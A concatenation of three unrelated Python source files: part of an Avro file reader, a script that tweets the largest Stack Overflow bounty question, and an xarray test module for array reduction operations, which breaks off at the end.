read_items.append(item_reader(fo, writer_schema, reader_schema))
block_count = read_long(fo)
return read_items
def read_map(fo, writer_schema, reader_schema=None):
"""Maps are encoded as a series of blocks.
Each block consists of a long count value, followed by that many key/value
pairs. A block with count zero indicates the end of the map. Each item is
encoded per the map's value schema.
If a block's count is negative, then the count is followed immediately by a
long block size, indicating the number of bytes in the block. The actual
count in this case is the absolute value of the count written.
"""
if reader_schema:
def item_reader(fo, w_schema, r_schema):
return read_data(fo, w_schema['values'], r_schema['values'])
else:
def item_reader(fo, w_schema, _):
return read_data(fo, w_schema['values'])
read_items = {}
block_count = read_long(fo)
while block_count != 0:
if block_count < 0:
block_count = -block_count
# Read block size, unused
read_long(fo)
for i in xrange(block_count):
key = read_utf8(fo)
read_items[key] = item_reader(fo, writer_schema, reader_schema)
block_count = read_long(fo)
return read_items
def read_union(fo, writer_schema, reader_schema=None):
"""A union is encoded by first writing a long value indicating the
zero-based position within the union of the schema of its value.
The value is then encoded per the indicated schema within the union.
"""
# schema resolution
index = read_long(fo)
if reader_schema:
# Handle case where the reader schema is just a single type (not union)
if not isinstance(reader_schema, list):
if match_types(writer_schema[index], reader_schema):
return read_data(fo, writer_schema[index], reader_schema)
else:
for schema in reader_schema:
if match_types(writer_schema[index], schema):
return read_data(fo, writer_schema[index], schema)
msg = 'schema mismatch: %s not found in %s' % \
(writer_schema, reader_schema)
raise SchemaResolutionError(msg)
else:
return read_data(fo, writer_schema[index])
def read_record(fo, writer_schema, reader_schema=None):
"""A record is encoded by encoding the values of its fields in the order
that they are declared. In other words, a record is encoded as just the
concatenation of the encodings of its fields. Field values are encoded per
their schema.
Schema Resolution:
* the ordering of fields may be different: fields are matched by name.
* schemas for fields with the same name in both records are resolved
recursively.
* if the writer's record contains a field with a name not present in the
reader's record, the writer's value for that field is ignored.
* if the reader's record schema has a field that contains a default value,
and writer's schema does not have a field with the same name, then the
reader should use the default value from its field.
* if the reader's record schema has a field with no default value, and
writer's schema does not have a field with the same name, then the
field's value is unset.
"""
record = {}
if reader_schema is None:
for field in writer_schema['fields']:
record[field['name']] = read_data(fo, field['type'])
else:
readers_field_dict = \
dict((f['name'], f) for f in reader_schema['fields'])
for field in writer_schema['fields']:
readers_field = readers_field_dict.get(field['name'])
if readers_field:
record[field['name']] = read_data(fo,
field['type'],
readers_field['type'])
else:
# should implement skip
read_data(fo, field['type'], field['type'])
# fill in default values
if len(readers_field_dict) > len(record):
writer_fields = [f['name'] for f in writer_schema['fields']]
for field_name, field in iteritems(readers_field_dict):
if field_name not in writer_fields:
default = field.get('default')
if 'default' in field:
record[field['name']] = default
else:
msg = 'No default value for %s' % field['name']
raise SchemaResolutionError(msg)
return record
LOGICAL_READERS = {
'long-timestamp-millis': read_timestamp_millis,
'long-timestamp-micros': read_timestamp_micros,
'int-date': read_date,
'bytes-decimal': read_bytes_decimal,
'string-uuid': read_uuid,
'int-time-millis': read_time_millis,
'long-time-micros': read_time_micros,
}
READERS = {
'null': read_null,
'boolean': read_boolean,
'string': read_utf8,
'int': read_long,
'long': read_long,
'float': read_float,
'double': read_double,
'bytes': read_bytes,
'fixed': read_fixed,
'enum': read_enum,
'array': read_array,
'map': read_map,
'union': read_union,
'error_union': read_union,
'record': read_record,
'error': read_record,
'request': read_record,
}
def read_data(fo, writer_schema, reader_schema=None):
"""Read data from file object according to schema."""
record_type = extract_record_type(writer_schema)
logical_type = extract_logical_type(writer_schema)
if reader_schema and record_type in AVRO_TYPES:
match_schemas(writer_schema, reader_schema)
try:
data = READERS[record_type](fo, writer_schema, reader_schema)
if 'logicalType' in writer_schema:
fn = LOGICAL_READERS[logical_type]
return fn(data, writer_schema, reader_schema)
return data
except StructError:
raise EOFError('cannot read %s from %s' % (record_type, fo))
def skip_sync(fo, sync_marker):
"""Skip an expected sync marker, complaining if it doesn't match"""
if fo.read(SYNC_SIZE) != sync_marker:
raise ValueError('expected sync marker not found')
def null_read_block(fo):
"""Read block in "null" codec."""
read_long(fo, None)
return fo
def deflate_read_block(fo):
"""Read block in "deflate" codec."""
data = read_bytes(fo, None)
# -15 is the log of the window size; negative indicates "raw" (no
# zlib headers) decompression. See zlib.h.
return MemoryIO(decompress(data, -15))
BLOCK_READERS = {
'null': null_read_block,
'deflate': deflate_read_block
}
try:
import snappy
def snappy_read_block(fo):
length = read_long(fo, None)
data = fo.read(length - 4)
fo.read(4) # CRC
return MemoryIO(snappy.decompress(data))
BLOCK_READERS['snappy'] = snappy_read_block
except ImportError:
pass
def _iter_avro(fo, header, codec, writer_schema, reader_schema):
"""Return iterator over avro records."""
sync_marker = header['sync']
# Value in schema is bytes
read_block = BLOCK_READERS.get(codec)
if not read_block:
raise ValueError('Unrecognized codec: %r' % codec)
block_count = 0
while True:
block_count = read_long(fo, None)
block_fo = read_block(fo)
for i in xrange(block_count):
yield read_data(block_fo, writer_schema, reader_schema)
skip_sync(fo, sync_marker)
class iter_avro:
"""Iterator over avro file."""
def __init__(self, fo, reader_schema=None):
"""Creates a new iterator
Paramaters
----------
fo: file like
Input stream
reader_schema: dict, optional
Reader schema
Example
-------
>>> with open('some-file.avro', 'rb') as fo:
>>> avro = iter_avro(fo)
>>> schema = avro.schema
>>> for record in avro:
>>> process_record(record)
"""
self.fo = fo
try:
self._header = read_data(fo, HEADER_SCHEMA)
except StopIteration:
raise ValueError('cannot read header - is it an avro file?')
# `meta` values are bytes. So, the actual decoding has to be external.
self.metadata = \
dict((k, btou(v)) for k, v in iteritems(self._header['meta']))
self.schema = self.writer_schema = \
json.loads(self.metadata['avro.schema'])
self.codec = self.metadata.get('avro.codec', 'null')
self.reader_schema = reader_schema
acquaint_schema(self.writer_schema, READERS)
if reader_schema:
populate_schema_defs(reader_schema)
self._records = _iter_avro(fo,
self._header,
self.codec,
self.writer_schema,
reader_schema)
def __iter__(self):
return self._records
def next(self):
return next(self._records)
__next__ = next
def schemaless_reader(fo, schema):
"""Reads a single record writen using the schemaless_writer
Paramaters
----------
fo: file like
Input stream
schema: dict
Reader schema
"""
acquaint_schema(schema, READERS)
return read_data(fo, schema)
def is_avro(path_or_buffer):
"""Return True if path (or buffer) points to an Avro file.
Paramaters
----------
path_or_buffer: path to file or file line object
Path to file
"""
if is_str(path_or_buffer):
fp = open(path_or_buffer, 'rb')
close = True
else:
fp = path_or_buffer
close = False
try:
header = fp.read(len(MAGIC))
return header == MAGIC
finally:
if close:
fp.close()
| |
# Downloads 'featured' (bountied) questions from Stack Overflow, picks the
# most interesting one based on the amount of the bounty and the score of
# the question, then posts a link to the question on Twitter.
#
# Author: Bill Cruise
# (Bill the Lizard on Stack Overflow, @lizardbill on Twitter)
#
# Dependencies: tweepy (https://github.com/tweepy/tweepy)
# Stack Exchange API: https://api.stackexchange.com/docs
# Twitter API: https://dev.twitter.com/
import json
import sys
import tweepy
import calendar
import ConfigParser
import HTMLParser
from tweepy import *
from ConfigParser import NoSectionError, NoOptionError
from time import gmtime, strftime
from urllib2 import urlopen, URLError
from zlib import decompress, MAX_WBITS
HOURS = 8
USER_ID = 1288 # Your Stack Overflow user id for sharing links
MAX_TWEET_LEN = 140
DATE_FORMAT = "%Y %b %d %H:%M:%S UTC"
def main():
# Get UTC time now and 8 hours ago.
to_time = calendar.timegm(gmtime())
print 'Time Now:', strftime(DATE_FORMAT, gmtime(to_time))
from_time = to_time - (HOURS * 60 * 60)
# Add 7 days to those times for bounty expiration comparison.
# Unfortunately bounty sort orders are not based on the time the bounty
# was posted or expires, but on the time the question was posted.
from_time += (7 * 24 * 60 * 60)
to_time += (7 * 24 * 60 * 60)
from_time_displ = strftime(DATE_FORMAT, gmtime(from_time))
to_time_displ = strftime(DATE_FORMAT, gmtime(to_time))
print 'Expiration target window:'
print from_time_displ
print to_time_displ
print
window_msg = 'Target Window: ' + from_time_displ + ' to ' + to_time_displ
log('status.log', window_msg)
try:
recent_bounties = request_bounties(from_time, to_time)
max_bounty = find_max(recent_bounties)
print '** Maximum Bounty **'
display(max_bounty)
status = format_status_msg(max_bounty)
print status
log('status.log', status)
close_time = gmtime(max_bounty['bounty_closes_date'])
close_time_fmt = strftime(DATE_FORMAT, close_time)
closes_msg = 'Bounty Closes: ' + close_time_fmt
log('status.log', closes_msg)
# tweet(status)
except TweepError:
print 'TweepError: ', sys.exc_info()[0]
log('error.log', 'TweepError: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
except URLError:
print 'URLError: ', sys.exc_info()[0]
log('error.log', 'URLError: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
except:
print 'Unexpected error:', sys.exc_info()[0]
log('error.log', 'Unexpected error: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
# Get a list of new bounty questions from Stack Overflow.
def request_bounties(from_time, to_time):
config = ConfigParser.RawConfigParser()
config.read('settings.cfg')
se_oauth_key = None
try:
se_oauth_key = CONSUMER_KEY = config.get('Stack Exchange OAuth', 'KEY')
except (NoSectionError, NoOptionError) as e:
pass
page = 1
page_size = 100
has_more = True
count = 1
recent_bounties = []
while(has_more):
request = 'https://api.stackexchange.com/2.1/questions/featured'
request += '?page=' + str(page) + '&pagesize=100'
request += '&order=asc&sort=activity&site=stackoverflow'
if se_oauth_key != None:
request += '&key=' + se_oauth_key
response = urlopen(request)
raw_data = response.read()
json_data = decompress(raw_data, 16 + MAX_WBITS).decode('UTF-8')
data = json.loads(json_data)
bounties = data['items']
has_more = data['has_more']
for bounty in bounties:
close = bounty['bounty_closes_date']
if from_time < close and close < to_time:
recent_bounties.append(bounty)
print 'Bounty:', count
print 'Closes:', close
display(bounty)
count += 1
page += 1
return recent_bounties
# Display the contents of a JSON bounty string.
def display(bounty):
print bounty['title']
print 'Tags:', bounty['tags']
print 'Bounty Amount:', bounty['bounty_amount']
print 'Question Score:', bounty['score']
close_time = gmtime(bounty['bounty_closes_date'])
close_time_fmt = strftime(DATE_FORMAT, close_time)
print 'Bounty Closes:', close_time_fmt
print 'View Count:', bounty['view_count']
print 'Question Id:', bounty['question_id']
print 'Is Answered:', bounty['is_answered']
print
# Find the maximum bounty.
# Give preference to highest scoring question in case of bounty ties.
def find_max(bounties):
max_bounty = ''
max_bounty_amt = 0
max_bounty_score = 0
for bounty in bounties:
if bounty['bounty_amount'] > max_bounty_amt:
max_bounty = bounty
max_bounty_amt = bounty['bounty_amount']
max_bounty_score = bounty['score']
elif bounty['bounty_amount'] == max_bounty_amt:
if bounty['score'] > max_bounty_score:
max_bounty = bounty
max_bounty_amt = bounty['bounty_amount']
max_bounty_score = bounty['score']
return max_bounty
# Format a JSON bounty string into a 140-character status message.
def format_status_msg(bounty_json):
bounty_title = bounty_json['title']
h = HTMLParser.HTMLParser()
bounty_title = h.unescape(bounty_title)
bounty_link = 'http://stackoverflow.com/q/'
bounty_link += str(bounty_json['question_id']) + '/' + str(USER_ID)
details = 'Amt:' + str(bounty_json['bounty_amount'])
tags = bounty_json['tags']
tag = hashify(tags[0])
details += ' ' + tag
# The URL in the status message will be shortened to
# 22 characters (24 with surrounding spaces)
# https://dev.twitter.com/blog/upcoming-tco-changes
msg_length = len(bounty_title) + 24 + len(details)
# Truncate the title to fit in a 140 character status message
if msg_length > MAX_TWEET_LEN:
allowed_title_len = MAX_TWEET_LEN - (24 + len(details))
bounty_title = bounty_title[0:allowed_title_len-3]
bounty_title = bounty_title.rpartition(' ')[0] + '...'
status = bounty_title + ' ' + bounty_link + ' ' + details
# Add more tags if they'll fit in the 140-character limit
tag_index = 1
while tag_index < len(tags):
tag = hashify(tags[tag_index])
if (len(status) + len(tag) + 1) < MAX_TWEET_LEN:
status += (' ' + tag)
tag_index += 1
return status
# Update the Twitter account authorized
# in settings.cfg with a status message.
def tweet(status):
config = ConfigParser.RawConfigParser()
config.read('settings.cfg')
# http://dev.twitter.com/apps/myappid
CONSUMER_KEY = config.get('Twitter OAuth', 'CONSUMER_KEY')
CONSUMER_SECRET = config.get('Twitter OAuth', 'CONSUMER_SECRET')
# http://dev.twitter.com/apps/myappid/my_token
ACCESS_TOKEN_KEY = config.get('Twitter OAuth', 'ACCESS_TOKEN_KEY')
ACCESS_TOKEN_SECRET = config.get('Twitter OAuth', 'ACCESS_TOKEN_SECRET')
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
result = api.update_status(status)
# Converts a Stack Overflow tag to a Twitter hashtag.
# The most common tags with special characters are covered,
# with special cases added as needed. (consider retagging on SO)
def hashify(tag):
tag_dict = {'c++':'cpp', 'c#':'csharp', 'f#':'fsharp',
'asp.net':'ASPdotNET', '.net':'dotNET',
'objective-c':'ObjectiveC', 'xml-parsing':'XMLparsing',
'ruby-on-rails':'RubyOnRails', 'ruby-on-rails-3':'RubyOnRails3',
'sql-server':'SQLServer', 'sql-server-2005':'SQLServer2005',
'sql-server-2008':'SQLServer2008',
'asp.net-mvc':'ASPdotNetMVC', 'asp.net-mvc-2':'ASPdotNetMVC2',
'asp.net-mvc-3':'ASPdotNetMVC3', 'asp.net-mvc-4':'ASPdotNetMVC4',
'asp.net-mvc-5':'ASPdotNetMVC5', 'asp.net-mvc-6':'ASPdotNetMVC6',
'vb.net':'VBdotNET', 'visual-studio':'VisualStudio',
'visual-studio-2010':'VS2010',
'web-services':'webservices', 'ActionScript3':'ActionScript3',
'cocoa-touch':'CocoaTouch', 'entity-framework':'EntityFramework',
'jquery-ui':'jqueryUI', 'node.js':'NodeJS',
'internet-explorer':'IE', '.htaccess':'htaccess',
'unit-testing':'UnitTesting', 'windows-phone-7':'WindowsPhone7',
'google-maps':'GoogleMaps', 'android-layout':'androidlayout'
}
tag = tag_dict.get(tag, tag) # returns either mapping or the original tag
tag = remove_hyphens(tag)
tag = tag.replace(".js", "")
return '#' + tag
# Removes hyphens from a tag and capitalizes each word.
def remove_hyphens(tag):
return ''.join(x.capitalize() or '-' for x in tag.split('-'))
# Write a timestamped message to the specified log file.
def log(filename, message):
timestamp = strftime(DATE_FORMAT + ': ', gmtime())
with open (filename, 'a') as f:
f.write (timestamp + message + '\n')
if __name__ == '__main__':
main()
| |
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import pytest
from numpy import array, nan
from xarray import DataArray, Dataset, cftime_range, concat
from xarray.core import dtypes, duck_array_ops
from xarray.core.duck_array_ops import (
array_notnull_equiv,
concatenate,
count,
first,
gradient,
last,
mean,
rolling_window,
stack,
where,
)
from xarray.core.pycompat import dask_array_type
from xarray.testing import assert_allclose, assert_equal
from . import (
arm_xfail,
assert_array_equal,
has_dask,
raises_regex,
requires_cftime,
requires_dask,
)
class TestOps:
@pytest.fixture(autouse=True)
def setUp(self):
self.x = array(
[
[[nan, nan, 2.0, nan], [nan, 5.0, 6.0, nan], [8.0, 9.0, 10.0, nan]],
[
[nan, 13.0, 14.0, 15.0],
[nan, 17.0, 18.0, nan],
[nan, 21.0, nan, nan],
],
]
)
def test_first(self):
expected_results = [
array([[nan, 13, 2, 15], [nan, 5, 6, nan], [8, 9, 10, nan]]),
array([[8, 5, 2, nan], [nan, 13, 14, 15]]),
array([[2, 5, 8], [13, 17, 21]]),
]
for axis, expected in zip([0, 1, 2, -3, -2, -1], 2 * expected_results):
actual = first(self.x, axis)
assert_array_equal(expected, actual)
expected = self.x[0]
actual = first(self.x, axis=0, skipna=False)
assert_array_equal(expected, actual)
expected = self.x[..., 0]
actual = first(self.x, axis=-1, skipna=False)
assert_array_equal(expected, actual)
with raises_regex(IndexError, "out of bounds"):
first(self.x, 3)
def test_last(self):
expected_results = [
array([[nan, 13, 14, 15], [nan, 17, 18, nan], [8, 21, 10, nan]]),
array([[8, 9, 10, nan], [nan, 21, 18, 15]]),
array([[2, 6, 10], [15, 18, 21]]),
]
for axis, expected in zip([0, 1, 2, -3, -2, -1], 2 * expected_results):
actual = last(self.x, axis)
assert_array_equal(expected, actual)
expected = self.x[-1]
actual = last(self.x, axis=0, skipna=False)
assert_array_equal(expected, actual)
expected = self.x[..., -1]
actual = last(self.x, axis=-1, skipna=False)
assert_array_equal(expected, actual)
with raises_regex(IndexError, "out of bounds"):
last(self.x, 3)
def test_count(self):
assert 12 == count(self.x)
expected = array([[1, 2, 3], [3, 2, 1]])
assert_array_equal(expected, count(self.x, axis=-1))
assert 1 == count(np.datetime64("2000-01-01"))
def test_where_type_promotion(self):
result = where([True, False], [1, 2], ["a", "b"])
assert_array_equal(result, np.array([1, "b"], dtype=object))
result = where([True, False], np.array([1, 2], np.float32), np.nan)
assert result.dtype == np.float32
assert_array_equal(result, np.array([1, np.nan], dtype=np.float32))
def test_stack_type_promotion(self):
result = stack([1, "b"])
assert_array_equal(result, np.array([1, "b"], dtype=object))
def test_concatenate_type_promotion(self):
result = concatenate([[1], ["b"]])
assert_array_equal(result, np.array([1, "b"], dtype=object))
def test_all_nan_arrays(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "All-NaN slice")
warnings.filterwarnings("ignore", "Mean of empty slice")
assert np.isnan(mean([np.nan, np.nan]))
def test_cumsum_1d():
inputs = np.array([0, 1, 2, 3])
expected = np.array([0, 1, 3, 6])
actual = duck_array_ops.cumsum(inputs)
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=0)
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=-1)
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=(0,))
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=())
assert_array_equal(inputs, actual)
def test_cumsum_2d():
inputs = np.array([[1, 2], [3, 4]])
expected = np.array([[1, 3], [4, 10]])
actual = duck_array_ops.cumsum(inputs)
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=(0, 1))
assert_array_equal(expected, actual)
actual = duck_array_ops.cumsum(inputs, axis=())
assert_array_equal(inputs, actual)
def test_cumprod_2d():
inputs = np.array([[1, 2], [3, 4]])
expected = np.array([[1, 2], [3, 2 * 3 * 4]])
actual = duck_array_ops.cumprod(inputs)
assert_array_equal(expected, actual)
actual = duck_array_ops.cumprod(inputs, axis=(0, 1))
assert_array_equal(expected, actual)
actual = duck_array_ops.cumprod(inputs, axis=())
assert_array_equal(inputs, actual)
class TestArrayNotNullEquiv:
@pytest.mark.parametrize(
"arr1, arr2",
[
(np.array([1, 2, 3]), np.array([1, 2, 3])),
(np.array([1, 2, np.nan]), np.array([1, np.nan, 3])),
(np.array([np.nan, 2, np.nan]), np.array([1, np.nan, np.nan])),
],
)
def test_equal(self, arr1, arr2):
assert array_notnull_equiv(arr1, arr2)
def test_some_not_equal(self):
a = np.array([1, 2, 4])
b = np.array([1, np.nan, 3])
assert not array_notnull_equiv(a, b)
def test_wrong_shape(self):
a = np.array([[1, np.nan, np.nan, 4]])
b = np.array([[1, 2], [np.nan, 4]])
assert not array_notnull_equiv(a, b)
@pytest.mark.parametrize(
"val1, val2, val3, null",
[
(
np.datetime64("2000"),
np.datetime64("2001"),
np.datetime64("2002"),
np.datetime64("NaT"),
),
(1.0, 2.0, 3.0, np.nan),
("foo", "bar", "baz", None),
("foo", "bar", "baz", np.nan),
],
)
def test_types(self, val1, val2, val3, null):
dtype = object if isinstance(val1, str) else None
arr1 = np.array([val1, null, val3, null], dtype=dtype)
arr2 = np.array([val1, val2, null, null], dtype=dtype)
assert array_notnull_equiv(arr1, arr2)
def construct_dataarray(dim_num, dtype, contains_nan, dask):
# dimnum <= 3
rng = np.random.RandomState(0)
shapes = [16, 8, 4][:dim_num]
dims = ("x", "y", "z")[:dim_num]
if np.issubdtype(dtype, np.floating):
array = rng.randn(*shapes).astype(dtype)
elif np.issubdtype(dtype, np.integer):
array = rng.randint(0, 10, size=shapes).astype(dtype)
elif np.issubdtype(dtype, np.bool_):
array = rng.randint(0, 1, size=shapes).astype(dtype)
elif dtype == str:
array = rng.choice(["a", "b", "c", "d"], size=shapes)
else:
raise ValueError
if contains_nan:
inds = rng.choice(range(array.size), int(array.size * 0.2))
dtype, fill_value = dtypes.maybe_promote(array.dtype)
array = array.astype(dtype)
array.flat[inds] = fill_value
da = DataArray(array, dims=dims, coords={"x": np.arange(16)}, name="da")
if dask and has_dask:
chunks = {d: 4 for d in dims}
da = da.chunk(chunks)
return da
def from_series_or_scalar(se):
if isinstance(se, pd.Series):
return DataArray.from_series(se)
else: # scalar case
return DataArray(se)
def series_reduce(da, func, dim, **kwargs):
""" convert DataArray to pd.Series, apply pd.func, then convert back to
a DataArray. Multiple dims cannot be specified."""
if dim is None or da.ndim == 1:
se = da.to_series()
return from_series_or_scalar(getattr(se, func)(**kwargs))
else:
da1 = []
dims = list(da.dims)
dims.remove(dim)
d = dims[0]
for i in range(len(da[d])):
da1.append(series_reduce(da.isel(**{d: i}), func, dim, **kwargs))
if d in da.coords:
return concat(da1, dim=da[d])
return concat(da1, dim=d)
def assert_dask_array(da, dask):
if dask and da.ndim > 0:
assert isinstance(da.data, dask_array_type)
@arm_xfail
@pytest.mark.parametrize("dask", [False, True])
def test_datetime_reduce(dask):
time = np.array(pd.date_range("15/12/1999", periods=11))
time[8:11] = np.nan
da = DataArray(np.linspace(0, 365, num=11), dims="time", coords={"time": time})
if dask and has_dask:
chunks = {"time": 5}
da = da.chunk(chunks)
actual = da["time"].mean()
assert not pd.isnull(actual)
actual = da["time"].mean(skipna=False)
assert pd.isnull(actual)
# test for a 0d array
assert da["time"][0].mean() == da["time"][:1].mean()
@requires_cftime
def test_cftime_datetime_mean():
times = cftime_range("2000", periods=4)
da = DataArray(times, dims=["time"])
assert da.isel(time=0).mean() == da.isel(time=0)
expected = DataArray(times.date_type(2000, 1, 2, 12))
result = da.mean()
assert_equal(result, expected)
da_2d = DataArray(times.values.reshape(2, 2))
result = da_2d.mean()
assert_equal(result, expected)
@requires_cftime
@requires_dask
def test_cftime_datetime_mean_dask_error():
times = cftime_range("2000", periods=4)
da = DataArray(times, dims=["time"]).chunk()
with pytest.raises(NotImplementedError):
da.mean()
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "min", "max", "mean", "var"])
# TODO test cumsum, cumprod
@pytest.mark.parametrize("skipna", [False, True])
@pytest.mark.parametrize("aggdim", [None, "x"])
def test_reduce(dim_num, dtype, dask, func, skipna, aggdim):
if aggdim == "y" and dim_num < 2:
pytest.skip("dim not in this test")
if dtype == np.bool_ and func == "mean":
pytest.skip("numpy does not support this")
if dask and not has_dask:
pytest.skip("requires dask")
if dask and skipna is False and dtype in [np.bool_]:
pytest.skip("dask does not compute object-typed array")
rtol = 1e-04 if dtype == np.float32 else 1e-05
da = construct_dataarray(dim_num, dtype, contains_nan=True, dask=dask)
axis = None if aggdim is None else da.get_axis_num(aggdim)
# TODO: remove these after resolving
# https://github.com/dask/dask/issues/3245
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "Mean of empty slice")
warnings.filterwarnings("ignore", "All-NaN slice")
warnings.filterwarnings("ignore", "invalid value encountered in")
if da.dtype.kind == "O" and skipna:
# Numpy < 1.13 does not handle object-type array.
try:
if skipna:
expected = getattr(np, f"nan{func}")(da.values, axis=axis)
else:
expected = getattr(np, func)(da.values, axis=axis)
actual = getattr(da, func)(skipna=skipna, dim=aggdim)
assert_dask_array(actual, dask)
assert np.allclose(
actual.values, np.array(expected), rtol=1.0e-4, equal_nan=True
)
except (TypeError, AttributeError, ZeroDivisionError):
# TODO currently, numpy does not support some methods such as
# nanmean for object dtype
pass
actual = getattr(da, func)(skipna=skipna, dim=aggdim)
# for dask case, make sure the result is the same for numpy backend
expected = getattr(da.compute(), func)(skipna=skipna, dim=aggdim)
assert_allclose(actual, expected, rtol=rtol)
# make sure the compatiblility with pandas' results.
if func in ["var", "std"]:
expected = series_reduce(da, func, skipna=skipna, dim=aggdim, ddof=0)
assert_allclose(actual, expected, rtol=rtol)
# also check ddof!=0 case
actual = getattr(da, func)(skipna=skipna, dim=aggdim, ddof=5)
if dask:
assert isinstance(da.data, dask_array_type)
expected = series_reduce(da, func, skipna=skipna, dim=aggdim, ddof=5)
assert_allclose(actual, expected, rtol=rtol)
else:
expected = series_reduce(da, func, skipna=skipna, dim=aggdim)
assert_allclose(actual, expected, rtol=rtol)
# make sure the dtype argument
if func not in ["max", "min"]:
actual = getattr(da, func)(skipna=skipna, dim=aggdim, dtype=float)
assert_dask_array(actual, dask)
assert actual.dtype == float
# without nan
da = construct_dataarray(dim_num, dtype, contains_nan=False, dask=dask)
actual = getattr(da, func)(skipna=skipna)
if dask:
assert isinstance(da.data, dask_array_type)
expected = getattr(np, f"nan{func}")(da.values)
if actual.dtype == object:
assert actual.values == np.array(expected)
else:
assert np.allclose(actual.values, np.array(expected), rtol=rtol)
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_, str])
@pytest.mark.parametrize("contains_nan", [True, False])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["min", "max"])
@pytest.mark.parametrize("skipna", [False, True])
@pytest.mark.parametrize("aggdim", ["x", "y"])
def test_argmin_max(dim_num, dtype, contains_nan, dask, func, skipna, aggdim):
# pandas-dev/pandas#16830, we do not check consistency with pandas but
# just make sure da[da.argmin()] == da.min()
if aggdim == "y" and dim_num < 2:
pytest.skip("dim not in this test")
if dask and not has_dask:
pytest.skip("requires dask")
if contains_nan:
if not skipna:
pytest.skip(
"numpy's argmin (not nanargmin) does not handle " "object-dtype"
)
if skipna and np.dtype(dtype).kind in "iufc":
pytest.skip("numpy's nanargmin raises ValueError for all nan axis")
da = construct_dataarray(dim_num, dtype, contains_nan=contains_nan, dask=dask)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "All-NaN slice")
actual = da.isel(
**{aggdim: getattr(da, "arg" + func)(dim=aggdim, skipna=skipna).compute()}
)
expected = getattr(da, func)(dim=aggdim, skipna=skipna)
assert_allclose(actual.drop(actual.coords), expected.drop(expected.coords))
def test_argmin_max_error():
da = construct_dataarray(2, np.bool_, contains_nan=True, dask=False)
da[0] = np.nan
with pytest.raises(ValueError):
da.argmin(dim="y")
@pytest.mark.parametrize(
"array",
[
np.array([np.datetime64("2000-01-01"), np.datetime64("NaT")]),
np.array([np.timedelta64(1, "h"), np.timedelta64("NaT")]),
np.array([0.0, np.nan]),
np.array([1j, np.nan]),
np.array(["foo", np.nan], dtype=object),
],
)
def test_isnull(array):
expected = np.array([False, True])
actual = duck_array_ops.isnull(array)
np.testing.assert_equal(expected, actual)
@requires_dask
def test_isnull_with_dask():
da = construct_dataarray(2, np.float32, contains_nan=True, dask=True)
assert isinstance(da.isnull().data, dask_array_type)
assert_equal(da.isnull().load(), da.load().isnull())
@pytest.mark.skipif(not has_dask, reason="This is for dask.")
@pytest.mark.parametrize("axis", [0, -1])
@pytest.mark.parametrize("window", [3, 8, 11])
@pytest.mark.parametrize("center", [True, False])
def test_dask_rolling(axis, window, center):
import dask.array as da
x = np.array(np.random.randn(100, 40), dtype=float)
dx = da.from_array(x, chunks=[(6, 30, 30, 20, 14), 8])
expected = rolling_window(
x, axis=axis, window=window, center=center, fill_value=np.nan
)
actual = rolling_window(
dx, axis=axis, window=window, center=center, fill_value=np.nan
)
assert isinstance(actual, da.Array)
assert_array_equal(actual, expected)
assert actual.shape == expected.shape
# we need to take care of window size if chunk size is small
# window/2 should be smaller than the smallest chunk size.
with pytest.raises(ValueError):
rolling_window(dx, axis=axis, window=100, center=center, fill_value=np.nan)
@pytest.mark.skipif(not has_dask, reason="This is for dask.")
@pytest.mark.parametrize("axis", [0, -1, 1])
@pytest.mark.parametrize("edge_order", [1, 2])
def test_dask_gradient(axis, edge_order):
import dask.array as da
array = np.array(np.random.randn(100, 5, 40))
x = np.exp(np.linspace(0, 1, array.shape[axis]))
darray = da.from_array(array, chunks=[(6, 30, 30, 20, 14), 5, 8])
expected = gradient(array, x, axis=axis, edge_order=edge_order)
actual = gradient(darray, x, axis=axis, edge_order=edge_order)
assert isinstance(actual, da.Array)
assert_array_equal(actual, expected)
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "prod"])
@pytest.mark.parametrize("aggdim", [None, "x"])
def test_min_count(dim_num, dtype, dask, func, aggdim):
if dask and not has_dask:
pytest.skip("requires dask")
da = construct_dataarray(dim_num, dtype, contains_nan=True, dask=dask)
min_count = 3
actual = getattr(da, func)(dim=aggdim, skipna=True, min_count=min_count)
expected = series_reduce(da, func, skipna=True, dim=aggdim, min_count=min_count)
assert_allclose(actual, expected)
assert_dask_array(actual, dask)
@pytest.mark.parametrize("func", ["sum", "prod"])
def test_min_count_dataset(func):
da = construct_dataarray(2, dtype=float, contains_nan=True, dask=False)
ds = Dataset({"var1": da}, coords={"scalar": 0})
actual = getattr(ds, func)(dim="x", skipna=True, min_count=3)["var1"]
expected = getattr(ds["var1"], func)(dim="x", skipna=True, min_count=3)
assert_allclose(actual, expected)
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "prod"])
def test_multiple_dims(dtype, dask, func):
if dask and not has_dask:
pytest.skip("requires dask")
da = construct_dataarray(3, dtype, contains_nan=True, dask=dask)
actual = getattr(da, func)(("x", "y"))
expected = getattr(getattr(da, func)("x"), func)("y")
assert_allclose(actual, expected)
def test_docs():
# with min_count
actual = DataArray.sum.__doc__
